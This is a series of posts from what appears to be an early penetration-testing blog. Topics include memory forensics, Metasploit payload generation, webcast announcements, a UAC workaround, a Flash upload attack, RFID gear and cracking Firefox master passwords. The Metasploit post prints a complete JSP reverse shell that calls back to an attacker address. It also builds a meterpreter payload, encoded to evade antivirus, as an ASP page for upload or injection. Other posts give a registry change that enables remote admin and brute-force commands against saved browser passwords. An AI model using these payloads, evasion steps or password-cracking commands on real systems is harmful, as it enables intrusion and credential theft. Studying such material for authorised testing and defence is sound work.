What am I talking about? I am talking about RAM!

Here are some of the things we can get from RAM, processes, network connections, open files, Encryption Keys – Bitlocker.

The last one Encryption keys from Bitlocker is an awesome presentation I read from Jesse Kornblum on how to get the keys for bitlocker, check it out: http://jessekornblum.com/presentations/omfw08.pdf

There are simply some great tools to get memory, You can use win32dd.exe. This tool will create a raw image file as well as write a MD5 hash of the output file you create.

My personal favorite though is Memoryze from Mandiant. You can find it here as a free download http://www.mandiant.com The cool thing about memoryze is that you can run enumeration tools to give you process information, the registry keys that are being used by the process, what DLL's are running, drivers loaded in memory, etc... The great thing about this is that you can do that on an image that it can enumerate from or on a live machine.

Here is how it works:

Open a command shell (cmd.exe) Change directories to where you installed Memoryze.

Type “MemoryDD.bat” It will create a directory called audits where it will put your memory image or

To write the image to a specific directory, type “MemoryDD.bat –output <directory_name>

To identify all open ports and their processes and Process Id's, type “Process.bat –ports true"

The output is put in xml format:

Notice above you can see the process forcefield.exe as process ID 900 it is making a connection out to IP address 68.142.101.68 on Port 80 This is simply a great way to tell what process is doing what. (ie…malware outbound connections)

Now suppose you wanted to look for rootkit's in Memory. You can use Mandiant's HookDetection.bat file. This executes RootkitAudit.Batch.xml. It identifies hooks in kernel memory often used to subvert the integrity of the system.  So you can see below the different processes and how the relate to the kernel or drivers etc…

Notice above you can see the module that has hooks into the kernel i.e 1394BUS.sys where it is located: \windows\system32\drivers\ and a description of it: “Driver”

If you had an unknown process  with hooks into the kernel you could find it here.

Now these are all great tools but, what do you do with a memory image after you have it? There are some basic techniques that you can use to do analysis.  I would start with a “strings” command.  So you can run strings memory.img > memory.str. Then you can begin to parse the file for emails, websites surfed to, or connected to by malware, passwords, blogged text, and unknown executables.

Once you have your image, you might choose to use a tool called Volatility. This tool simply ROCKS!

Here is how it works using Linux:

python volatility command –f /path_to_windows_memory_image

The keyword command refers to a series of commands that you can choose from. Here is a list:

So what can we do with this? Let me show you. First let’s see what processes are running in memory.

first I type the command:

python volatility pslist –f /path_to_image/imagefile.img

and I will see output like this:

Now you can see the executables running. You can also see from the second column what the PID (Process ID) is. So let’s say we did not know what jusched.exe was. (PID 2228) and we thought it might be malware and would like to send it to virus total. Well then, let’s grab it right out of the memory.

python volatility procdump –p 2228 –f /path_to_image/imagefile.img

Now we have carved that process out. However to be sure we did this correctly let’s take a look at what it is using khexedit. Since this is suppose to be an .exe file it should start off in hex with MZ

so in linux khexedit executable.2228.exe

We can see that it is in fact what we are looking for so we could now send this up to virus total, or look deeper into the file to see what it does.

Well that is it for memory on this post. As always be good, be safe, hack legally, responsibly, and share the knowledge -–I’m Out

There are several flavors you can now export your payloads in Metasploit, making the insertion of them more and more flexible.  If we use the msfpayload command alone we can generate the following output of buffers for the Payloads:

C 

Perl

Ruby -

JavaScript

Executable

VBA Raw

The output for the programming languages can be used in exploit code being developed or inserted into programs, Raw can be passed to msfencode for further processing and the executable can be used to generate a single file executable that depending on the payload it will be the executable type created and Architecture.  Currently executables can be created for the following OS:

Windows (x86 and x64)

AIX (PPC)

Solaris (Sparc and x86)

Linux (Mips, PPC and x86)

OSX (ARM, PPC and Intel)

BSD (Sparc and x86)

To get a list of all payloads and their description just run the program msfpayload wit the –h flag:

  1: ./msfpayload -h
  2: 
  3:     Usage: ./msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA>
  4: 
  5: Framework Payloads (198 total)
  6: ==============================
  7: 
  8:     Name                                             Description
  9:     ----                                             -----------
 10: ................
 11:     java/jsp_shell_bind_tcp                          Listen for a connection and spawn a command shell
 12:     java/jsp_shell_reverse_tcp                       Connect back to attacker and spawn a command shell
 13: 
 14: ................
 15:     php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
 16:     php/bind_php                                     Listen for a connection and spawn a command shell via php
 17:     php/download_exec                                Download an EXE from a HTTP URL and execute it
 18:     php/exec                                         Execute a single system command
 19:     php/reverse_perl                                 Creates an interactive shell via perl
 20:     php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
 21:     php/shell_findsock                               
 22: 				Spawn a shell on the established connection to
 23: 				the webserver.  Unfortunately, this payload
 24: 				leaves conspicuous evil-looking entries in the
 25: 				apache error logs, so it is probably a good idea
 26: 				to use a bind or reverse shell unless firewalls
 27: 				prevent them from working.  The issue this
 28: 				payload takes advantage of (CLOEXEC flag not set
 29: 				on sockets) appears to have been patched on the
 30: 				Ubuntu version of Apache and may not work on
 31: 				other Debian-based distributions.  Only tested on
 32: 				Apache but it might work on other web servers
 33: 				that leak file descriptors to child processes.

If we take a look at the snipped of output shown bellow you can see that several payloads are actually code that we can turn to code that can be placed in a web server for execution, the 2 types of payloads that allow us to do this are Java jsp and PHP code, just set the output to Raw and save the output to a file.

To get the list of options you just use the Summarize option.

  1: ./msfpayload java/jsp_shell_reverse_tcp S
  2: 
  3:        Name: Java JSP Command Shell, Reverse TCP Inline
  4:     Version: 7550
  5:    Platform: Windows, OSX, Linux, Unix, Solaris
  6:        Arch: java
  7: Needs Admin: No
  8:  Total size: 0
  9:        Rank: Normal
 10: 
 11: Provided by:
 12:   sf <stephen_fewer@harmonysecurity.com>
 13: 
 14: Basic options:
 15: Name   Current Setting  Required  Description
 16: ----   ---------------  --------  -----------
 17: LHOST                   yes       The local address
 18: LPORT  4444             yes       The local port
 19: SHELL  cmd.exe          yes       The system shell to use.
 20: 
 21: Description:
 22:   Connect back to attacker and spawn a command shell
 23: 

Lets generate a JSP file with some options so as to run it on a Windows server supporting JSP like an Oracle Application server

  1: ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.224,LPORT=8080 R > /tmp/reversejsp.jsp

if we now take a look at the code generated it will look like this:

  1: 
  2: 			<%@page import="java.lang.*"%>
  3: 			<%@page import="java.util.*"%>
  4: 			<%@page import="java.io.*"%>
  5: 			<%@page import="java.net.*"%>
  6: 
  7: 			<%
  8: 				class StreamConnector extends Thread
  9: 				{
 10: 					InputStream is;
 11: 					OutputStream os;
 12: 					  
 13: 					StreamConnector( InputStream is, OutputStream os )
 14: 					{
 15: 						this.is = is;
 16: 						this.os = os;
 17: 					}
 18: 							  
 19: 					public void run()
 20: 					{
 21: 						BufferedReader in  = null;
 22: 						BufferedWriter out = null;
 23: 						try
 24: 						{
 25: 							in  = new BufferedReader( new InputStreamReader( this.is ) );
 26: 							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
 27: 							char buffer[] = new char[8192];
 28: 							int length;
 29: 							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
 30: 							{
 31: 								out.write( buffer, 0, length );
 32: 								out.flush();
 33: 							}
 34: 						} catch( Exception e ){}
 35: 						try
 36: 						{
 37: 							if( in != null )
 38: 								in.close();
 39: 							if( out != null )
 40: 								out.close();
 41: 						} catch( Exception e ){}
 42: 					}
 43: 				}
 44: 
 45: 				try
 46: 				{
 47: 					Socket socket = new Socket( "192.168.1.224", 8080 );
 48: 					Process process = Runtime.getRuntime().exec( "cmd.exe" );
 49: 					( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
 50: 					( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
 51: 				} catch( Exception e ) {}
 52: 			%>
 53: 		

As it can be seen this is code where the code in lines 47 thru 50 is executing the cmd.exe command and piping the output thru a socket back to the attacker, the shell is also an option that can be changed to be /bin/bash if setting on a Linux host.

Now if we want other formats not included in msfpayload and we want to also obfuscate by encoding our payload so as to make it more difficult to detect by AV (Anti Virus) and HIPS (Host Intrusion Prevention System) we use the msfencode command:

  1: ./msfencode -h
  2: 
  3:     Usage: ./msfencode <options>
  4: 
  6: 
  7:     -a <opt>  The architecture to encode as
  8:     -b <opt>  The list of characters to avoid: '\x00\xff'
  9:     -c <opt>  The number of times to encode the data
 10:     -e <opt>  The encoder to use
 11:     -h        Help banner
 12:     -i <opt>  Encode the contents of the supplied file path
 13:     -l        List available encoders
 14:     -m <opt>  Specifies an additional module search path
 15:     -n        Dump encoder information
 16:     -o <opt>  The output file
 17:     -p <opt>  The platform to encode for
 18:     -s <opt>  The maximum size of the encoded data
 19:     -t <opt>  The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba, vbs, loop-vbs, asp)
 20:     -x <opt>  Specify an alternate win32 executable template
 21: 
 

By piping the Raw output to msfencode we can manipulate even more the payload, some of the most used options are the following:

-a for specifying the architecture(x86, x64).

-c to specify the number of encoded to do.

-i for the encode type.

-t for the format of the buffer.

There are different encoding types and they are rated on their effectiveness, to get a list we use the –l option:

  1: ./msfencode -l
  2: 
  3: Framework Encoders
  4: ==================
  5: 
  6:     Name                    Rank       Description
  7:     ----                    ----       -----------
  8:     cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
  9:     cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
 10:     generic/none            normal     The "none" Encoder
 11:     mipsbe/longxor          normal     XOR Encoder
 12:     mipsle/longxor          normal     XOR Encoder
 13:     php/base64              normal     PHP Base64 encoder
 14:     ppc/longxor             normal     PPC LongXOR Encoder
 15:     ppc/longxor_tag         normal     PPC LongXOR Encoder
 16:     sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
 17:     x64/xor                 normal     XOR Encoder
 18:     x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
 19:     x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
 20:     x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
 21:     x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
 22:     x86/countdown           normal     Single-byte XOR Countdown Encoder
 23:     x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
 24:     x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
 25:     x86/nonalpha            low        Non-Alpha Encoder
 26:     x86/nonupper            low        Non-Upper Encoder
 27:     x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
 28:     x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
 29:     x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

The highest one rank is x86/shikata_ga_nai for X86 code, do notice that depending on the payload you must be careful that the encoding and the architecture for which you are generating the payload match.

In the format buffers we get the same as with msfpayload but we also get some very interesting ones like:

elf – ELF (Executable and Linking Format) Binary executable for Linux system

vbs – Visual Basic Scripting

loop-vbs-  Visual Basic Script that will loop and re-execute every x number of seconds specified in the options

ASP – Active Server Pages from Microsoft's .Net Framework.

As it can be seen we have some very interesting options for outputting our code and delivering it to our targets.

Lets generate a Meterpreter payload, encoded several times and convert it to an ASP page:

  1: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.224,LPORT=993 R | ./msfencode -c 5 -e x86/shikata_ga_nai -a X86 -t asp > evilpage.asp
  2: [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
  3: 
  4: [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
  5: 
  6: [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
  7: 
  8: [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
  9: 
 10: [*] x86/shikata_ga_nai succeeded with size 426 (iteration=5

Now this ASP page can be uploaded to a web server or place inside the code of a valid ASP page thru injection.

One important note is the more you encode the bigger the file so keep that in mind if your delivery mechanism is affected by the size.

As it can be seen Metasploit gives a large set of formats to export our payloads thus giving greater flexibility on avenues of attack.

PaulDotCom is very excited to bring you several new webcast series starting next January. The webcasts will be produced, hosted, and performed by the members of PaulDotCom. In addition to the White Hat World webcasts, there will be several different topic-based webcasts that will highlight different areas of information security. The first two are sure to be a "smash hit" as we show you how to improve your skills in the areas of client-side penetration testing and web application assessments (and even avenge the death of your master). Information about each webcast, including the registration links, is below:

Title: Practical Client-Side Exploitation Kung Fu

Description: In this webcast we will explore the tools & techniques needed to perform successful client-side exploitation. Practical methods for information gathering, target selection, and exploit delivery will be covered.

Date: Thursday, January 21, 2010

Time: 2:00 PM - 3:00 PM EST

Sponsor: Core Security Technologies

Register Here: https://www1.gotomeeting.com/register/171250512

Title: Practical Web Application Pen Testing Kung Fu

Description: In this session John & Paul will guide you to performing more successful web application penetration testing. You will learn how to balance automated tools with manual testing, strike vulnerabilities with the highest chance of exploitation, and more!

Date: Tuesday, January 26, 2010

Time: 2:00 PM - 3:00 PM EST

Sponsor: Cenzic

Register Here: https://www1.gotomeeting.com/register/290940024

One of the great eye opening moments for me in the past few years was learning that we are outnumbered. Not only does it appear that there is a non-stop wave of malware and evil sites that are constantly trying to infect our systems, but it seems like our user population is working against us as well by trying to click on every evil link or evil file that they come upon. Because of this it is very easy to feel like the plight of today’s security professional is a grim one. I often say that we are in one of the only professions I know of which is destined to fail. You will have a breach and there will be compromises; you will get called out. In light of this reality I still find that information security professionals are a fairly happy lot. The trade-off for having the cards stacked against us is in that we get to work in on of the coolest fields.

If you don't think so….please get out. There are other people who would love to have your job.

However, I have also realized recently that we are not alone. There is another group of professionals that we work with every day that can help us. Our Administrator brethren are an untapped resource for the information security community. We need to start cross-training with them if we want to stand a chance against the onslaught of attacks and malware that we face on a daily basis.

There are a number of different ways to go about this. There are commercial training options for your systems administrators that are short and to the point. I will be teaching one of these classes online and another in New Orleans in January. Please see the below links for more information.

564 online.

564 in New Orleans with Mechanical Bull and Beads.

However, beyond the commercial options there is something that we should be doing as well. I recommend having weekly brown bag meetings where you can show your systems administrators some cool tricks for ideating an incident and they can show you some neat tricks for understanding the business application process flow of your organization. This tradeoff is beneficial because it illuminates both aspects of an organization, security and day-to-day administration.

Keep in mind that one of the greatest instructors of evil, the great Bastard Operator From Hell, was a Systems Administrator. There is much we can learn from them.

So Much To Learn!

-strandjs

Have you had trouble using PSEXEC or other remote administrative tools on Windows Vista, Windows 7 and WIndows 2008 servers? If so, UAC (User Access Control) might be preventing your tools from working. Windows UAC drops all the Administrator privileges from the SAT (Security Access Token) for REMOTE connections that are using LOCAL accounts. This restriction prevents all remote administrative functions such as connecting to administrative shares (C$, etc) installing services or launching a new process (psexec).

In the scenario where Computer1 belongs to the PenTesterDomain and Computer2 belongs to WORGROUP or the PentestCustomerDomain, Computer1 will not be able to connect to \\computer2\c$ or other administrative functions using the local administrator username and password on computer2. Because UAC restricts the use of administrator privileges to Interactive local sessions and to Domain accounts you will need to use a domain account.

If your using Metasploits psexec module you will need to specify the SMBDomain. This option doesn't appear when you type "show options", but it is available under the advanced options ("show advanced").

Once you've obtained some type of remote execution on the target host you can enable remote administrative functions by creating the following registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\LocalAccountTokenFilterPolicy

Create a DWORD entry at that location and set it's value to 1.

After the target machine has been rebooted you will be able to connect to the C$ share, launch PSEXEC and perform other administrative functions using the local accounts on the target system.

References:
http://forum.strataframe.net/Attachment943.aspx
http://blogs.msdn.com/vistacompatteam/archive/2006/09/22/766945.aspx

Still think allowing users to upload files to your server is OK?

There has been quite a bit of buzz surrounding the newest Flash attack. Please review this site for a quick write-up. I want to make it clear this attack vector is different than a remote vulnerability in Flash. This attack is focused on an individual uploading a flash file to a server and then having it execute when a user visits the site.

Adobe has a nice write-up out lining the issue and their initial response to the problem here. I really like the write-up and the quote of a core axiom of computer security: "If you allow a bad guy to upload programs to your web site, it's not your web site anymore." That is very true.

However, in the article they re-state that the issue at hand is the Same Origin Policy issue. Mike Bailey of Foreground Security neatly breaks down where the Adobe response fails to completely address the issue here.

The point he makes is Adobe draws similarities between Javascript and SWF files. He shows that this comparison has some very interesting limitations. First, simply uploading a .js file to a webserver does not mean the file can be executed. However, if someone were to upload a .swf file to the server it can be executed within the context of the server. Now… Here is where it gets interesting, if a user loads a .swf file to a server and changes the extension, it can still execute within the context of the server. Who thought this was a good idea?

His point is that the scenarios where .swf files can be executed is far more pervasive then the .js counterparts that Adobe discusses.

The reason this fascinates me is that it is outside the bounds of what penetration testers would normally look for in a web application. Because this attack vector is not a remote exploit, it does not get the buzz that it deserves. The point is that when we are testing we need to look for vulnerabilities and attacks that attackers would use. This attack vector is definitely in that category. Further, this is not something that is easily fixed with a patch.

There are two things we need to take from this. First, file upload attacks have to be in your arsenal. Second, from the defensive side, Adobe is right. As much as I would like disagree with the technical aspects of their response to this vulnerability, they are correct. If you design your web infrastructure to allow file uploads and for those uploads to be executed, there are going to be serious security ramifications. What would be the alternative? Flash could try fix their plugin to at least validate file extensions before executing, or possibly require the content-type headers in the HTML (not in the file) before executing the flash, thus bringing it more in line with the analogy with Javascript they discussed in their write-up.

Until they do (and I don't expect this to happen any time soon) we will have a new vector to test for in our engagements.

-strandjs

John Strand will be teaching SANS Network Penetration Testing in
London from 11/30 to 12/6 2009, and SANS hacker techniques and Incident Response in New Orleans from 01/10/10 till 01/18/10.

Get it here!

There are a couple of very cool things in this release. First, there are now standalone installs for Windows and Linux. This is a nice feature in light of some of the recent conflicts between Ruby versions and the framework.

Another feature that I like is the ability to embed Payloads into other .exe files. The OSVDB references are also very nice when it comes to report creating time. NX support in payloads will be a big help.

There is quite a lot to review/take in. Check out the full release notes here.

Be expecting a full review/discussion on our next show!!

All I can say is bring on 3.4 dev!

-strandjs

Let me start by saying that these are the opinions of a contributor. To this day I have contributed to the project 3 Auxiliary Modules and 16 Meterpreter scripts to the project and I had the honor and privilege to present with HD in Defcon 17 in the Metasploit Trac. I was initially in shock when I saw the news on my iPhone while stuck in traffic, when I saw the news I could not believe it, I thought it was a joke. When I got to my office I quickly checked the web pages and listen to the Risky Business Podcast where they interviewed about the acquisition and read all of the tweets of people in favor and against it, their worries, rants and comments. After all of this I mentioned,I came to the conclusion that this is a great thing for the project for a lot of time this project has been the labor of love of the members of the Metasploit project, with very few active committers and summiteers other than a handful, each putting of their own free time, sacrificing long nights, family time and money to work on the project. Some wrote code to scratch their own itch and solve problems they had others just did it for the same motivation that have pushed hackers everywhere to write code, the fun of creating something and learning how stuff works. In my case I stopped doing penetration tests and security audits many years ago and in December of last year decided to get back in to the game by sharing stuff in my blog, forums and turning a lot of the stuff I knew in to tools and scripts, in that process I started writing code for Metasploit and I never found in any other project a community so patient and willing to help. HD has given me tips that made me a better coder, he was always patient and cotius with me and other contributors, the members of the team have also always been helpful like Natron, ET, Chris Gates and MC with each piece of code I wrote (which many time was ugly as hell). HD is now a father and as a dad also of little girl I know how hard it is to spend time coding to contribute to a community and sacrifice the precious time one has with something as precious as ones own child, what he did will give him more time to spend with his family and still work on the project he loves as well as for some of the members of the Metasploit team. Here is a list of the advantages I see:

• 1. Code will have dedicated dev team to work on it.
• 2. More stable code base since more resources for testing will be available.
• 3. More exploits and features to come faster since there will be a dedicated team.
• 4. The side effect that other projects like Canvas, Core Impact and others will have a stronger competitor thus making them better their products even more.
• 5. Support for pentester and others that use the framework.

 

The fears I have seen express by many have been:

• 1. The code going private and closed source.
• 2. That many of the cool features and exploits will be charged for by Rapid7
• 3. That the community will disappear.

To this  I answer, HD has put long hours and money to fund this project by himself, he has expressed that he will continue to keep the project open source as well as support the community and to this I say he has more than earned our support and trust. I trust HD and keep him to his word. The project is under BSD license so the same community that has made Metasploit grow can fork it and keep it going, but for now my trust is on HD and the Dev team. So lets keep supporting the project by contributing, testing the code, reporting bugs and make this and even better framework. I do say I envy HD and Egyp7 from the team, they are now working full time on what they love so I say to them and the rest of the Metasploit team congratulations and my best wishes.

We've been asked a number of times for advice on RFID equipment that can be used to start experimenting with RFID technologies. We've heard your request loud and clear; I'm going to give you a rundown of what is in my current kit.

Start at the Beginning

The first reader that I picked up was the PhidgetRFID board.

It was inexpensive, included all the bits and pieces I needed for interfacing (USB built in) along with some sample applications and open community. It reads uniqely numbered EN4x02 series tag quite well. This reader is read only, and operates in the 125 kHz spectrum.

Moving On Up

Shortly there after I realized that I wanted to write tags. Of course I was familiar with the RFIDIOt project and I wanted a writer that would work with that particular code. I picked up an ACG reader with USB interface from Major Malfunction (the author of RFIDIOt) in order to help support the project.

It was expensive and it needed to be imported to me from the UK but I couldn't find an equivalent reader elsewhere that could come close to the cost. I picked up the ACG LF USB reader, which works like a champ reading and writing to all manners of tags. If I had to do it again, I'd upgrade to the ACG LAHF USB which wasn't available at the time. While I was there, I also picked up the ultra cheap USB Keyboard Wedge Verification LF Reader just for fun.

Unfortunatley the next project that I wanted to purse involved the reading of ISO 14443A/B tags, which wasn't supported by my ACG reader (the upgraded model does, hence my recommendation for the upgrade). In order to support the reading of ISO 14443A/B tags, I picked up the Omnikey Cardman 5321, which also has a smart card reader as well.

Ooh, two hacking tools in one! I did acquire this reader much cheaper here in the US. The supplier no longer has them available but there are several that are Google-able. In typical fashion I wanted to be able to read ISO 14443A/B tags in order to read PayPass RFID tags which I found out isn't supported by RFIDIOt...yet. A chat with Major Malfunction at Defcon revealed that he is close to being able to support the PayPass chips.

Going Standalone

I was also fortunate to be able to acquire some Parallax modules form the Defcon Wireless village RFID scavenger hunt a few years ago. Thorn put them together in a kit to build a standalone EN4X02 reader with serial LCD display.

It worked great, but I've got some new plans for the modules, such as integrating them with an Arduino and a few extra goodies for good measure.

The Latest Goods

A few weeks ago I picked up a VivoPay Paypass 3000 reader off of ebay for a few dollars (under $10).

It was "tested and working" and it does appear to be that way. Unfortunatley I need to construct a serial adapter for it and my tools seem to be missing. I have some headed my way this after noon, so this is an ongoing project.

The neat option with this reader is the PayPass support. It will read the card and handle all of the over the air encryption. The module handles all of the decryption, and hands off the clear text of the tag voa serial; this is the paort that would be handed to the Point of Sale System. Bonus, let's use the intended purpose of the hardware do the crypto for us, and interface with 3ric's pwnpass script. Stay tuned for more goodies with this one.

[Update: During the writing of this post, I was successful in building the serial adapter and testing it with the tools from VIVOtech, as well as the pwnpass script. However, I think that this reader has an old version of firmware that cannot understand the commands issued to it. I have to call VIVOtech to get ahold of the latest firmware, which I'm told is fairly easy to do.]

You'll note that I don't have any inventory of active RFID equipment; all of my gear is passive. I haven't had any experience with any active gear, and for me, the cost is more prohibitive.

Right now, that's what I've got in my kit and I've found I can read just about any type of tag that I can encounter, from passports to physical security cards. Some are a work in progress, but they are just a matter of time. Scan away! Also, I'm more than willing to let you scan my RFID implant in person should we meet.

Larry "haxorthematrix" Pesce

To quote Carlos "dark0perator" Perez, "shell is just the beginning". Now that we have access to a machine, we can gather all sorts of goodies, we just need to know where to look.

Some of my favorite local system information gathering techniques include grabbing Firefox stored passwords. Prior to version 3.5, (for version 3) the list of sites and associated passwords were stored in signons3.txt. If a master password is set you also need the file "key3.db" as it will allow you to unlock the password store. For Firefox versions 3.5 or better, you need to acquire the file "signons.sqlite". For a detailed description of the contents and format of each of these files, check out the FirePassword page.

But why recover these usernames and passwords? How many people do you know let their browser store passwords for them? Personally, I know a lot. Users store passwords for just about everything; personal sites, banking and corporate resources.

Yes, corporate resources. If you have credentials to these resources, this may open up a whole new world to your testing. Imagine that you now have credentials to web based management utilities allowing access to a million credit card numbers (or something as equally juicy such as social security numbers).

So how do we do it? Ok, first grab the signons3.txt and key3.db files (or signins.sqlite for Firefox 3.5) and get them to a system where you can work with them. I'm finding that a windows system is best, given the tools available. I'm using Windows 7 in a VM, with firefox installed. Many of the tools like to look for the default Firefox profile directory, so I often copy the files there - I'm not concerned about the install of firefox in this VM.

The Firefox browser itself can be used to view the passwords in the password store. Firefox 3.5 uses a different format for storing passwords; they now store them in a sqllite database. If we copy over the files (signons3.txt and key3.db) to the default firefox profile (C:\Documents and Settings\[user]\Application Data\Mozilla\Profiles\[random].profle in many cases) run Firefox, and go to Tools -> Options -> Security -> Saved Passwords -> Show Passwords we can see them in plain text. Neat, now we have the URL, username and password! But wait, you mean now we are being asked for a master password? Well, we need to provide one in order to view the passwords!

We can use FireMaster to obtain the master password. FireMaster is a Windows-based master password brute force tool, and operates against key3.db and signons3.txt. It will do all of the typical brute force attacks; dictionary, hybrid, and bruteforce. It is a fairly simple tool to use, but here are a few examples. In these examples, Firemaster is in the same directory as key3.db and signons3.txt so my profile path is set as "." at the end of the command:

[Update: During the writing of this segment, I noted that the author updated FireMaster so automatically detect the version of Firefox based on the storing of the information in signons3.txt or the sqlite method! We can now use this tool to get the goods from Firefox 3.5 as well.]

Below is an example of a dictionary attack:

FireMaster.exe -d -f wordlist.txt .

Note that you need to be careful with your wordlist. I used a copy of the all inclusive free version from ftp.openwall.org which I had to convert LF to CRLF. I also had to remove words with spaces and non US character sets. If I didn't I got a nasty crash from FireMaster. Can you say potential buffer overflow anyone?

Below is an example of a hybrid attack:

Firemaster.exe -h -f wordlist.txt -n 3 -g "0123456789" -s -p .

Again, same wordlist issues. With the hybrid, it will append (-s) and prepend (-p) the number of characters (-n 3) as defines by the defined character set (-g). The larger your number of characters and character sets the more time you will need.

Below is an example of a brute force attack:

FireMaster.exe -b -l 10 .

This one will set the max password length to 10 characters (-l), so adjust to you needs. It also uses the default character set of "abcdefghijklmnopqrstuvwxyz*@#!$123" which you may also need to tailor with the -g option. On my machine this would take over 300,000 days to complete at about 120,000 guesses a second. On a high end, non-virtual system the guessing jumped up to about 250,000 guesses a second for about 160,000 days to completion.

Ouch.

My vote is for a good dictionary. We covered scraping websites for making custom wordlists in Episode 129 of the podcast.

I've also had some good luck with Firefox Password recovery from top-password.com. Granted, it wasn't free, but the $18 was something I could afford for expenses on an engagement. It won't crack or bypass the master password, but may be a little more safe than a machine running an old version of Firefox. Just another option. It hasn't been updated for Firefox versions 3.5 or better signons.sqlite yet.

So, want a free solution? The author of FireMaster has a command line FirePass and GUI FirePasswordViewer tool to do the same, with Firefox 3.5 support! Start recovering and use the results responsibly (and with permission)!

- Larry "haxorthamtrix" Pesce